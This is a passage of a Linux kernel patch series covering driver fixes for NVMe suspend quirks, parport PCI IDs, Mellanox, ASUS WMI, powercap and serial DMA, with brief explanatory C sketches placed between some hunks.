++			return NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND;
+ 	}
+ 
+ 	return 0;
+@@ -3133,7 +3145,9 @@ static struct nvme_dev *nvme_pci_alloc_dev(struct pci_dev *pdev,
+ 	dev->dev = get_device(&pdev->dev);
+ 
+ 	quirks |= check_vendor_combination_bug(pdev);
+-	if (!noacpi && acpi_storage_d3(&pdev->dev)) {
++	if (!noacpi &&
++	    !(quirks & NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND) &&
++	    acpi_storage_d3(&pdev->dev)) {
+ 		/*
+ 		 * Some systems use a bios work around to ask for D3 on
+ 		 * platforms that support kernel managed suspend.
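
The new NVMe quirk simply wins over the ACPI D3 heuristic: when NVME_QUIRK_FORCE_NO_SIMPLE_SUSPEND is set by the DMI match, the acpi_storage_d3() branch is never taken. Reduced to the flag logic alone (a hedged sketch; inputs are invented for the demo):

    #include <stdbool.h>
    #include <stdio.h>

    #define QUIRK_FORCE_NO_SIMPLE_SUSPEND (1u << 20)

    static bool use_simple_suspend(unsigned quirks, bool noacpi, bool acpi_d3)
    {
        /* The force-off quirk is checked before the ACPI hint, so a DMI
         * match can veto simple suspend even on D3-capable platforms. */
        return !noacpi &&
               !(quirks & QUIRK_FORCE_NO_SIMPLE_SUSPEND) &&
               acpi_d3;
    }

    int main(void)
    {
        printf("%d\n", use_simple_suspend(0, false, true));                             /* 1 */
        printf("%d\n", use_simple_suspend(QUIRK_FORCE_NO_SIMPLE_SUSPEND, false, true)); /* 0 */
        return 0;
    }
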
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 0fbf331a748fd..9bb9fe0fad07c 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -104,8 +104,9 @@ int of_reconfig_notify(unsigned long action, struct of_reconfig_data *p)
+  *
+  * Returns the new state of a device based on the notifier used.
+  *
+- * Return: 0 on device going from enabled to disabled, 1 on device
+- * going from disabled to enabled and -1 on no change.
++ * Return: OF_RECONFIG_CHANGE_REMOVE on device going from enabled to
++ * disabled, OF_RECONFIG_CHANGE_ADD on device going from disabled to
++ * enabled and OF_RECONFIG_NO_CHANGE on no change.
+  */
+ int of_reconfig_get_state_change(unsigned long action, struct of_reconfig_data *pr)
+ {
+diff --git a/drivers/parport/parport_pc.c b/drivers/parport/parport_pc.c
+index 5784dc20fb382..4605758d32146 100644
+--- a/drivers/parport/parport_pc.c
++++ b/drivers/parport/parport_pc.c
+@@ -2614,6 +2614,8 @@ enum parport_pc_pci_cards {
+ 	netmos_9865,
+ 	quatech_sppxp100,
+ 	wch_ch382l,
++	brainboxes_uc146,
++	brainboxes_px203,
+ };
+ 
+ 
+@@ -2678,6 +2680,8 @@ static struct parport_pc_pci {
+ 	/* netmos_9865 */               { 1, { { 0, -1 }, } },
+ 	/* quatech_sppxp100 */		{ 1, { { 0, 1 }, } },
+ 	/* wch_ch382l */		{ 1, { { 2, -1 }, } },
++	/* brainboxes_uc146 */	{ 1, { { 3, -1 }, } },
++	/* brainboxes_px203 */	{ 1, { { 0, -1 }, } },
+ };
+ 
+ static const struct pci_device_id parport_pc_pci_tbl[] = {
+@@ -2771,6 +2775,23 @@ static const struct pci_device_id parport_pc_pci_tbl[] = {
+ 	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, quatech_sppxp100 },
+ 	/* WCH CH382L PCI-E single parallel port card */
+ 	{ 0x1c00, 0x3050, 0x1c00, 0x3050, 0, 0, wch_ch382l },
++	/* Brainboxes IX-500/550 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x402a,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, oxsemi_pcie_pport },
++	/* Brainboxes UC-146/UC-157 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0be1,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc146 },
++	{ PCI_VENDOR_ID_INTASHIELD, 0x0be2,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_uc146 },
++	/* Brainboxes PX-146/PX-257 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x401c,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, oxsemi_pcie_pport },
++	/* Brainboxes PX-203 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x4007,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, brainboxes_px203 },
++	/* Brainboxes PX-475 */
++	{ PCI_VENDOR_ID_INTASHIELD, 0x401f,
++	  PCI_ANY_ID, PCI_ANY_ID, 0, 0, oxsemi_pcie_pport },
+ 	{ 0, } /* terminate list */
+ };
+ MODULE_DEVICE_TABLE(pci, parport_pc_pci_tbl);
+diff --git a/drivers/platform/mellanox/mlxbf-bootctl.c b/drivers/platform/mellanox/mlxbf-bootctl.c
+index 1c7a288b59a5c..6a171a4f9dc68 100644
+--- a/drivers/platform/mellanox/mlxbf-bootctl.c
++++ b/drivers/platform/mellanox/mlxbf-bootctl.c
+@@ -17,6 +17,7 @@
+ 
+ #define MLXBF_BOOTCTL_SB_SECURE_MASK		0x03
+ #define MLXBF_BOOTCTL_SB_TEST_MASK		0x0c
++#define MLXBF_BOOTCTL_SB_DEV_MASK		BIT(4)
+ 
+ #define MLXBF_SB_KEY_NUM			4
+ 
+@@ -37,11 +38,18 @@ static struct mlxbf_bootctl_name boot_names[] = {
+ 	{ MLXBF_BOOTCTL_NONE, "none" },
+ };
+ 
++enum {
++	MLXBF_BOOTCTL_SB_LIFECYCLE_PRODUCTION = 0,
++	MLXBF_BOOTCTL_SB_LIFECYCLE_GA_SECURE = 1,
++	MLXBF_BOOTCTL_SB_LIFECYCLE_GA_NON_SECURE = 2,
++	MLXBF_BOOTCTL_SB_LIFECYCLE_RMA = 3
++};
++
+ static const char * const mlxbf_bootctl_lifecycle_states[] = {
+-	[0] = "Production",
+-	[1] = "GA Secured",
+-	[2] = "GA Non-Secured",
+-	[3] = "RMA",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_PRODUCTION] = "Production",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_GA_SECURE] = "GA Secured",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_GA_NON_SECURE] = "GA Non-Secured",
++	[MLXBF_BOOTCTL_SB_LIFECYCLE_RMA] = "RMA",
+ };
+ 
+ /* ARM SMC call which is atomic and no need for lock. */
+@@ -165,25 +173,30 @@ static ssize_t second_reset_action_store(struct device *dev,
+ static ssize_t lifecycle_state_show(struct device *dev,
+ 				    struct device_attribute *attr, char *buf)
+ {
++	int status_bits;
++	int use_dev_key;
++	int test_state;
+ 	int lc_state;
+ 
+-	lc_state = mlxbf_bootctl_smc(MLXBF_BOOTCTL_GET_TBB_FUSE_STATUS,
+-				     MLXBF_BOOTCTL_FUSE_STATUS_LIFECYCLE);
+-	if (lc_state < 0)
+-		return lc_state;
++	status_bits = mlxbf_bootctl_smc(MLXBF_BOOTCTL_GET_TBB_FUSE_STATUS,
++					MLXBF_BOOTCTL_FUSE_STATUS_LIFECYCLE);
++	if (status_bits < 0)
++		return status_bits;
+ 
+-	lc_state &=
+-		MLXBF_BOOTCTL_SB_TEST_MASK | MLXBF_BOOTCTL_SB_SECURE_MASK;
++	use_dev_key = status_bits & MLXBF_BOOTCTL_SB_DEV_MASK;
++	test_state = status_bits & MLXBF_BOOTCTL_SB_TEST_MASK;
++	lc_state = status_bits & MLXBF_BOOTCTL_SB_SECURE_MASK;
+ 
+ 	/*
+ 	 * If the test bits are set, we specify that the current state may be
+ 	 * due to using the test bits.
+ 	 */
+-	if (lc_state & MLXBF_BOOTCTL_SB_TEST_MASK) {
+-		lc_state &= MLXBF_BOOTCTL_SB_SECURE_MASK;
+-
++	if (test_state) {
+ 		return sprintf(buf, "%s(test)\n",
+ 			       mlxbf_bootctl_lifecycle_states[lc_state]);
++	} else if (use_dev_key &&
++		   (lc_state == MLXBF_BOOTCTL_SB_LIFECYCLE_GA_SECURE)) {
++		return sprintf(buf, "Secured (development)\n");
+ 	}
+ 
+ 	return sprintf(buf, "%s\n", mlxbf_bootctl_lifecycle_states[lc_state]);
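
The lifecycle decode above splits one SMC status word into three fields rather than masking in place. A self-contained sketch of the same decoding, with the mask values taken from the hunk and the I/O reduced to printf:

/* Decode secure-state, test and dev-key fields from one status word. */
#include <stdio.h>

#define SB_SECURE_MASK 0x03
#define SB_TEST_MASK   0x0c
#define SB_DEV_MASK    (1 << 4)

enum { LC_PRODUCTION, LC_GA_SECURE, LC_GA_NON_SECURE, LC_RMA };

static const char *const lc_names[] = {
	"Production", "GA Secured", "GA Non-Secured", "RMA",
};

static void show_lifecycle(int status_bits)
{
	int lc_state = status_bits & SB_SECURE_MASK;

	if (status_bits & SB_TEST_MASK)
		printf("%s(test)\n", lc_names[lc_state]);
	else if ((status_bits & SB_DEV_MASK) && lc_state == LC_GA_SECURE)
		printf("Secured (development)\n");
	else
		printf("%s\n", lc_names[lc_state]);
}

int main(void)
{
	show_lifecycle(0x11); /* dev key + GA Secured -> "Secured (development)" */
	return 0;
}
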
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index 2d4bbe99959ef..db7a1d360cd2c 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -1202,6 +1202,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 	attr->dev_attr.show = mlxbf_pmc_event_list_show;
+ 	attr->nr = blk_num;
+ 	attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL, "event_list");
++	if (!attr->dev_attr.attr.name)
++		return -ENOMEM;
+ 	pmc->block[blk_num].block_attr[i] = &attr->dev_attr.attr;
+ 	attr = NULL;
+ 
+@@ -1214,6 +1216,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  "enable");
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[++i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 	}
+@@ -1240,6 +1244,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  "counter%d", j);
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[++i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 
+@@ -1251,6 +1257,8 @@ static int mlxbf_pmc_init_perftype_counter(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  "event%d", j);
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[++i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 	}
+@@ -1283,6 +1291,8 @@ static int mlxbf_pmc_init_perftype_reg(struct device *dev, int blk_num)
+ 		attr->nr = blk_num;
+ 		attr->dev_attr.attr.name = devm_kasprintf(dev, GFP_KERNEL,
+ 							  events[j].evt_name);
++		if (!attr->dev_attr.attr.name)
++			return -ENOMEM;
+ 		pmc->block[blk_num].block_attr[i] = &attr->dev_attr.attr;
+ 		attr = NULL;
+ 		i++;
+@@ -1311,6 +1321,8 @@ static int mlxbf_pmc_create_groups(struct device *dev, int blk_num)
+ 	pmc->block[blk_num].block_attr_grp.attrs = pmc->block[blk_num].block_attr;
+ 	pmc->block[blk_num].block_attr_grp.name = devm_kasprintf(
+ 		dev, GFP_KERNEL, pmc->block_name[blk_num]);
++	if (!pmc->block[blk_num].block_attr_grp.name)
++		return -ENOMEM;
+ 	pmc->groups[blk_num] = &pmc->block[blk_num].block_attr_grp;
+ 
+ 	return 0;
+@@ -1442,6 +1454,8 @@ static int mlxbf_pmc_probe(struct platform_device *pdev)
+ 
+ 	pmc->hwmon_dev = devm_hwmon_device_register_with_groups(
+ 		dev, "bfperf", pmc, pmc->groups);
++	if (IS_ERR(pmc->hwmon_dev))
++		return PTR_ERR(pmc->hwmon_dev);
+ 	platform_set_drvdata(pdev, pmc);
+ 
+ 	return 0;
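
The pattern enforced by these hunks is simply "check every formatted-name allocation before use". A userspace analogue with asprintf(3), which has the same failure mode; this is illustrative, not driver code:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>

static int make_attr_name(char **name, int idx)
{
	/* asprintf() returns -1 and leaves *name undefined on failure,
	 * so the result must be checked before the pointer is used. */
	if (asprintf(name, "counter%d", idx) < 0)
		return -1; /* maps to the driver's -ENOMEM path */
	return 0;
}

int main(void)
{
	char *name;

	if (make_attr_name(&name, 3))
		return 1;
	puts(name);
	free(name);
	return 0;
}
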
+diff --git a/drivers/platform/surface/aggregator/core.c b/drivers/platform/surface/aggregator/core.c
+index 1a6373dea109c..6152be38398c4 100644
+--- a/drivers/platform/surface/aggregator/core.c
++++ b/drivers/platform/surface/aggregator/core.c
+@@ -231,9 +231,12 @@ static int ssam_receive_buf(struct serdev_device *dev, const unsigned char *buf,
+ 			    size_t n)
+ {
+ 	struct ssam_controller *ctrl;
++	int ret;
+ 
+ 	ctrl = serdev_device_get_drvdata(dev);
+-	return ssam_controller_receive_buf(ctrl, buf, n);
++	ret = ssam_controller_receive_buf(ctrl, buf, n);
++
++	return ret < 0 ? 0 : ret;
+ }
+ 
+ static void ssam_write_wakeup(struct serdev_device *dev)
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index 1396a839dd8a4..d5acef3202dad 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -271,6 +271,7 @@ config ASUS_WMI
+ 	depends on RFKILL || RFKILL = n
+ 	depends on HOTPLUG_PCI
+ 	depends on ACPI_VIDEO || ACPI_VIDEO = n
++	depends on SERIO_I8042 || SERIO_I8042 = n
+ 	select INPUT_SPARSEKMAP
+ 	select LEDS_CLASS
+ 	select NEW_LEDS
+@@ -287,7 +288,6 @@ config ASUS_WMI
+ config ASUS_NB_WMI
+ 	tristate "Asus Notebook WMI Driver"
+ 	depends on ASUS_WMI
+-	depends on SERIO_I8042 || SERIO_I8042 = n
+ 	help
+ 	  This is a driver for newer Asus notebooks. It adds extra features
+ 	  like wireless radio and bluetooth control, leds, hotkeys, backlight...
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index df1db54d4e183..af3da303e2b15 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -501,8 +501,6 @@ static const struct dmi_system_id asus_quirks[] = {
+ 
+ static void asus_nb_wmi_quirks(struct asus_wmi_driver *driver)
+ {
+-	int ret;
+-
+ 	quirks = &quirk_asus_unknown;
+ 	dmi_check_system(asus_quirks);
+ 
+@@ -517,15 +515,6 @@ static void asus_nb_wmi_quirks(struct asus_wmi_driver *driver)
+ 
+ 	if (tablet_mode_sw != -1)
+ 		quirks->tablet_switch_mode = tablet_mode_sw;
+-
+-	if (quirks->i8042_filter) {
+-		ret = i8042_install_filter(quirks->i8042_filter);
+-		if (ret) {
+-			pr_warn("Unable to install key filter\n");
+-			return;
+-		}
+-		pr_info("Using i8042 filter function for receiving events\n");
+-	}
+ }
+ 
+ static const struct key_entry asus_nb_wmi_keymap[] = {
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 49dd55b8e8faf..296150eaef929 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -3839,6 +3839,12 @@ static int asus_wmi_add(struct platform_device *pdev)
+ 		goto fail_wmi_handler;
+ 	}
+ 
++	if (asus->driver->quirks->i8042_filter) {
++		err = i8042_install_filter(asus->driver->quirks->i8042_filter);
++		if (err)
++			pr_warn("Unable to install key filter - %d\n", err);
++	}
++
+ 	asus_wmi_battery_init(asus);
+ 
+ 	asus_wmi_debugfs_init(asus);
+@@ -3873,6 +3879,8 @@ static int asus_wmi_remove(struct platform_device *device)
+ 	struct asus_wmi *asus;
+ 
+ 	asus = platform_get_drvdata(device);
++	if (asus->driver->quirks->i8042_filter)
++		i8042_remove_filter(asus->driver->quirks->i8042_filter);
+ 	wmi_remove_notify_handler(asus->driver->event_guid);
+ 	asus_wmi_backlight_exit(asus);
+ 	asus_wmi_input_exit(asus);
+diff --git a/drivers/platform/x86/wmi.c b/drivers/platform/x86/wmi.c
+index 2b79377cc21e2..b3f3e23a64eee 100644
+--- a/drivers/platform/x86/wmi.c
++++ b/drivers/platform/x86/wmi.c
+@@ -1227,6 +1227,11 @@ static int parse_wdg(struct device *wmi_bus_dev, struct acpi_device *device)
+ 		if (debug_dump_wdg)
+ 			wmi_dump_wdg(&gblock[i]);
+ 
++		if (!gblock[i].instance_count) {
++			dev_info(wmi_bus_dev, FW_INFO "%pUL has zero instances\n", &gblock[i].guid);
++			continue;
++		}
++
+ 		if (guid_already_parsed_for_legacy(device, &gblock[i].guid))
+ 			continue;
+ 
+diff --git a/drivers/powercap/dtpm_cpu.c b/drivers/powercap/dtpm_cpu.c
+index 8a2f18fa3faf5..9193c3b8edebe 100644
+--- a/drivers/powercap/dtpm_cpu.c
++++ b/drivers/powercap/dtpm_cpu.c
+@@ -140,6 +140,8 @@ static void pd_release(struct dtpm *dtpm)
+ 	if (policy) {
+ 		for_each_cpu(dtpm_cpu->cpu, policy->related_cpus)
+ 			per_cpu(dtpm_per_cpu, dtpm_cpu->cpu) = NULL;
++
++		cpufreq_cpu_put(policy);
+ 	}
+ 	
+ 	kfree(dtpm_cpu);
+@@ -191,12 +193,16 @@ static int __dtpm_cpu_setup(int cpu, struct dtpm *parent)
+ 		return 0;
+ 
+ 	pd = em_cpu_get(cpu);
+-	if (!pd || em_is_artificial(pd))
+-		return -EINVAL;
++	if (!pd || em_is_artificial(pd)) {
++		ret = -EINVAL;
++		goto release_policy;
++	}
+ 
+ 	dtpm_cpu = kzalloc(sizeof(*dtpm_cpu), GFP_KERNEL);
+-	if (!dtpm_cpu)
+-		return -ENOMEM;
++	if (!dtpm_cpu) {
++		ret = -ENOMEM;
++		goto release_policy;
++	}
+ 
+ 	dtpm_init(&dtpm_cpu->dtpm, &dtpm_ops);
+ 	dtpm_cpu->cpu = cpu;
+@@ -216,6 +222,7 @@ static int __dtpm_cpu_setup(int cpu, struct dtpm *parent)
+ 	if (ret)
+ 		goto out_dtpm_unregister;
+ 
++	cpufreq_cpu_put(policy);
+ 	return 0;
+ 
+ out_dtpm_unregister:
+@@ -227,6 +234,8 @@ out_kfree_dtpm_cpu:
+ 		per_cpu(dtpm_per_cpu, cpu) = NULL;
+ 	kfree(dtpm_cpu);
+ 
++release_policy:
++	cpufreq_cpu_put(policy);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/scsi/be2iscsi/be_main.c b/drivers/scsi/be2iscsi/be_main.c
+index 50a577ac3bb42..b6df0d4319072 100644
+--- a/drivers/scsi/be2iscsi/be_main.c
++++ b/drivers/scsi/be2iscsi/be_main.c
+@@ -2710,6 +2710,7 @@ init_wrb_hndl_failed:
+ 		kfree(pwrb_context->pwrb_handle_base);
+ 		kfree(pwrb_context->pwrb_handle_basestd);
+ 	}
++	kfree(phwi_ctxt->be_wrbq);
+ 	return -ENOMEM;
+ }
+ 
+diff --git a/drivers/tee/optee/device.c b/drivers/tee/optee/device.c
+index 64f0e047c23d2..4b10921276942 100644
+--- a/drivers/tee/optee/device.c
++++ b/drivers/tee/optee/device.c
+@@ -60,7 +60,16 @@ static void optee_release_device(struct device *dev)
+ 	kfree(optee_device);
+ }
+ 
+-static int optee_register_device(const uuid_t *device_uuid)
++static ssize_t need_supplicant_show(struct device *dev,
++				    struct device_attribute *attr,
++				    char *buf)
++{
++	return 0;
++}
++
++static DEVICE_ATTR_RO(need_supplicant);
++
++static int optee_register_device(const uuid_t *device_uuid, u32 func)
+ {
+ 	struct tee_client_device *optee_device = NULL;
+ 	int rc;
+@@ -83,6 +92,10 @@ static int optee_register_device(const uuid_t *device_uuid)
+ 		put_device(&optee_device->dev);
+ 	}
+ 
++	if (func == PTA_CMD_GET_DEVICES_SUPP)
++		device_create_file(&optee_device->dev,
++				   &dev_attr_need_supplicant);
++
+ 	return rc;
+ }
+ 
+@@ -142,7 +155,7 @@ static int __optee_enumerate_devices(u32 func)
+ 	num_devices = shm_size / sizeof(uuid_t);
+ 
+ 	for (idx = 0; idx < num_devices; idx++) {
+-		rc = optee_register_device(&device_uuid[idx]);
++		rc = optee_register_device(&device_uuid[idx], func);
+ 		if (rc)
+ 			goto out_shm;
+ 	}
+diff --git a/drivers/tty/serial/8250/8250_dw.c b/drivers/tty/serial/8250/8250_dw.c
+index 7db51781289ed..88035100b86c6 100644
+--- a/drivers/tty/serial/8250/8250_dw.c
++++ b/drivers/tty/serial/8250/8250_dw.c
+@@ -795,6 +795,7 @@ static const struct acpi_device_id dw8250_acpi_match[] = {
+ 	{ "INT33C5", (kernel_ulong_t)&dw8250_dw_apb },
+ 	{ "INT3434", (kernel_ulong_t)&dw8250_dw_apb },
+ 	{ "INT3435", (kernel_ulong_t)&dw8250_dw_apb },
++	{ "INTC10EE", (kernel_ulong_t)&dw8250_dw_apb },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(acpi, dw8250_acpi_match);
+diff --git a/drivers/tty/serial/8250/8250_early.c b/drivers/tty/serial/8250/8250_early.c
+index f271becfc46c1..02c9b98a6bbf1 100644
+--- a/drivers/tty/serial/8250/8250_early.c
++++ b/drivers/tty/serial/8250/8250_early.c
+@@ -197,6 +197,7 @@ static int __init early_omap8250_setup(struct earlycon_device *device,
+ OF_EARLYCON_DECLARE(omap8250, "ti,omap2-uart", early_omap8250_setup);
+ OF_EARLYCON_DECLARE(omap8250, "ti,omap3-uart", early_omap8250_setup);
+ OF_EARLYCON_DECLARE(omap8250, "ti,omap4-uart", early_omap8250_setup);
++OF_EARLYCON_DECLARE(omap8250, "ti,am654-uart", early_omap8250_setup);
+ 
+ #endif
+ 
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 2e21f74a24705..0b04d810b3e61 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -825,7 +825,7 @@ static void __dma_rx_do_complete(struct uart_8250_port *p)
+ 	if (priv->habit & UART_HAS_RHR_IT_DIS) {
+ 		reg = serial_in(p, UART_OMAP_IER2);
+ 		reg &= ~UART_OMAP_IER2_RHR_IT_DIS;
+-		serial_out(p, UART_OMAP_IER2, UART_OMAP_IER2_RHR_IT_DIS);
++		serial_out(p, UART_OMAP_IER2, reg);
+ 	}
+ 
+ 	dmaengine_tx_status(rxchan, cookie, &state);
+@@ -967,7 +967,7 @@ static int omap_8250_rx_dma(struct uart_8250_port *p)
+ 	if (priv->habit & UART_HAS_RHR_IT_DIS) {
+ 		reg = serial_in(p, UART_OMAP_IER2);
+ 		reg |= UART_OMAP_IER2_RHR_IT_DIS;
+-		serial_out(p, UART_OMAP_IER2, UART_OMAP_IER2_RHR_IT_DIS);
++		serial_out(p, UART_OMAP_IER2, reg);
+ 	}
+ 
+ 	dma_async_issue_pending(dma->rxchan);
+@@ -1186,10 +1186,12 @@ static int omap_8250_dma_handle_irq(struct uart_port *port)
+ 
+ 	status = serial_port_in(port, UART_LSR);
+ 
+-	if (priv->habit & UART_HAS_EFR2)
+-		am654_8250_handle_rx_dma(up, iir, status);
+-	else
+-		status = omap_8250_handle_rx_dma(up, iir, status);
++	if ((iir & 0x3f) != UART_IIR_THRI) {
++		if (priv->habit & UART_HAS_EFR2)
++			am654_8250_handle_rx_dma(up, iir, status);
++		else
++			status = omap_8250_handle_rx_dma(up, iir, status);
++	}
+ 
+ 	serial8250_modem_status(up);
+ 	if (status & UART_LSR_THRE && up->dma->tx_err) {
+diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c
+index 0a1cc36f93aa7..c74eaf2552c32 100644
+--- a/drivers/tty/serial/amba-pl011.c
++++ b/drivers/tty/serial/amba-pl011.c
+@@ -218,17 +218,18 @@ static struct vendor_data vendor_st = {
+ 
+ /* Deals with DMA transactions */
+ 
+-struct pl011_sgbuf {
+-	struct scatterlist sg;
+-	char *buf;
++struct pl011_dmabuf {
++	dma_addr_t		dma;
++	size_t			len;
++	char			*buf;
+ };
+ 
+ struct pl011_dmarx_data {
+ 	struct dma_chan		*chan;
+ 	struct completion	complete;
+ 	bool			use_buf_b;
+-	struct pl011_sgbuf	sgbuf_a;
+-	struct pl011_sgbuf	sgbuf_b;
++	struct pl011_dmabuf	dbuf_a;
++	struct pl011_dmabuf	dbuf_b;
+ 	dma_cookie_t		cookie;
+ 	bool			running;
+ 	struct timer_list	timer;
+@@ -241,7 +242,8 @@ struct pl011_dmarx_data {
+ 
+ struct pl011_dmatx_data {
+ 	struct dma_chan		*chan;
+-	struct scatterlist	sg;
++	dma_addr_t		dma;
++	size_t			len;
+ 	char			*buf;
+ 	bool			queued;
+ };
+@@ -365,32 +367,24 @@ static int pl011_fifo_to_tty(struct uart_amba_port *uap)
+ 
+ #define PL011_DMA_BUFFER_SIZE PAGE_SIZE
+ 
+-static int pl011_sgbuf_init(struct dma_chan *chan, struct pl011_sgbuf *sg,
++static int pl011_dmabuf_init(struct dma_chan *chan, struct pl011_dmabuf *db,
+ 	enum dma_data_direction dir)
+ {
+-	dma_addr_t dma_addr;
+-
+-	sg->buf = dma_alloc_coherent(chan->device->dev,
+-		PL011_DMA_BUFFER_SIZE, &dma_addr, GFP_KERNEL);
+-	if (!sg->buf)
++	db->buf = dma_alloc_coherent(chan->device->dev, PL011_DMA_BUFFER_SIZE,
++				     &db->dma, GFP_KERNEL);
++	if (!db->buf)
+ 		return -ENOMEM;
+-
+-	sg_init_table(&sg->sg, 1);
+-	sg_set_page(&sg->sg, phys_to_page(dma_addr),
+-		PL011_DMA_BUFFER_SIZE, offset_in_page(dma_addr));
+-	sg_dma_address(&sg->sg) = dma_addr;
+-	sg_dma_len(&sg->sg) = PL011_DMA_BUFFER_SIZE;
++	db->len = PL011_DMA_BUFFER_SIZE;
+ 
+ 	return 0;
+ }
+ 
+-static void pl011_sgbuf_free(struct dma_chan *chan, struct pl011_sgbuf *sg,
++static void pl011_dmabuf_free(struct dma_chan *chan, struct pl011_dmabuf *db,
+ 	enum dma_data_direction dir)
+ {
+-	if (sg->buf) {
++	if (db->buf) {
+ 		dma_free_coherent(chan->device->dev,
+-			PL011_DMA_BUFFER_SIZE, sg->buf,
+-			sg_dma_address(&sg->sg));
++				  PL011_DMA_BUFFER_SIZE, db->buf, db->dma);
+ 	}
+ }
+ 
+@@ -551,8 +545,8 @@ static void pl011_dma_tx_callback(void *data)
+ 
+ 	spin_lock_irqsave(&uap->port.lock, flags);
+ 	if (uap->dmatx.queued)
+-		dma_unmap_sg(dmatx->chan->device->dev, &dmatx->sg, 1,
+-			     DMA_TO_DEVICE);
++		dma_unmap_single(dmatx->chan->device->dev, dmatx->dma,
++				dmatx->len, DMA_TO_DEVICE);
+ 
+ 	dmacr = uap->dmacr;
+ 	uap->dmacr = dmacr & ~UART011_TXDMAE;
+@@ -638,18 +632,19 @@ static int pl011_dma_tx_refill(struct uart_amba_port *uap)
+ 			memcpy(&dmatx->buf[first], &xmit->buf[0], second);
+ 	}
+ 
+-	dmatx->sg.length = count;
+-
+-	if (dma_map_sg(dma_dev->dev, &dmatx->sg, 1, DMA_TO_DEVICE) != 1) {
++	dmatx->len = count;
++	dmatx->dma = dma_map_single(dma_dev->dev, dmatx->buf, count,
++				    DMA_TO_DEVICE);
++	if (dmatx->dma == DMA_MAPPING_ERROR) {
+ 		uap->dmatx.queued = false;
+ 		dev_dbg(uap->port.dev, "unable to map TX DMA\n");
+ 		return -EBUSY;
+ 	}
+ 
+-	desc = dmaengine_prep_slave_sg(chan, &dmatx->sg, 1, DMA_MEM_TO_DEV,
++	desc = dmaengine_prep_slave_single(chan, dmatx->dma, dmatx->len, DMA_MEM_TO_DEV,
+ 					     DMA_PREP_INTERRUPT | DMA_CTRL_ACK);
+ 	if (!desc) {
+-		dma_unmap_sg(dma_dev->dev, &dmatx->sg, 1, DMA_TO_DEVICE);
++		dma_unmap_single(dma_dev->dev, dmatx->dma, dmatx->len, DMA_TO_DEVICE);
+ 		uap->dmatx.queued = false;
+ 		/*
+ 		 * If DMA cannot be used right now, we complete this
+@@ -813,8 +808,8 @@ __acquires(&uap->port.lock)
+ 	dmaengine_terminate_async(uap->dmatx.chan);
+ 
+ 	if (uap->dmatx.queued) {
+-		dma_unmap_sg(uap->dmatx.chan->device->dev, &uap->dmatx.sg, 1,
+-			     DMA_TO_DEVICE);
++		dma_unmap_single(uap->dmatx.chan->device->dev, uap->dmatx.dma,
++				 uap->dmatx.len, DMA_TO_DEVICE);
+ 		uap->dmatx.queued = false;
+ 		uap->dmacr &= ~UART011_TXDMAE;
+ 		pl011_write(uap->dmacr, uap, REG_DMACR);
+@@ -828,15 +823,15 @@ static int pl011_dma_rx_trigger_dma(struct uart_amba_port *uap)
+ 	struct dma_chan *rxchan = uap->dmarx.chan;
+ 	struct pl011_dmarx_data *dmarx = &uap->dmarx;
+ 	struct dma_async_tx_descriptor *desc;
+-	struct pl011_sgbuf *sgbuf;
++	struct pl011_dmabuf *dbuf;
+ 
+ 	if (!rxchan)
+ 		return -EIO;
+ 
+ 	/* Start the RX DMA job */
